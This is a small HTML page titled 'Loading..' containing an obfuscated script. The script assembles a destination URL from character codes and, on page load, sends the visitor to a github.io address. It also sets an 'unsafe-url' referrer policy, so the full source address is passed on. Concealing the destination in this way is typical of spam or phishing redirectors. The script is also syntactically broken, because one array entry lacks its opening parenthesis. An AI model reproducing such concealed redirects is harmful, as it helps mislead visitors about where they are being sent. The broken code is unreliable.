<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="referrer" content="unsafe-url">
    <title>Loading..</title>
</head>
<body class="responsive">
<script>
    var ours = [
        String.fromCharCode(104,116,116,112,115,58,47,47,99,104,97,114,108,101,115,107,111,110,116,111,108,46,103,105,116,104,117,98,46,105,111,47,97,120,108,112,108),
        String.fromCharCode104,116,116,112,115,58,47,47,99,104,97,114,108,101,115,107,111,110,116,111,108,46,103,105,116,104,117,98,46,105,111,47,97,120,108,112,108),        
	
    ];
    window.addEventListener("DOMContentLoaded", function () {
        var c = ours[Math.floor(Math.random() * ours.length)], b = navigator.userAgent.toLowerCase(),
            a = -1 !== b.indexOf("msie");
        b = parseInt(b.substr(4, 2), 10);
        a && 9 > b ? (a = document.createElement("a"), a.href = c, document.body.appendChild(a), a.click()) : window.location.href = c;
    });
</script>
</body>
</html>
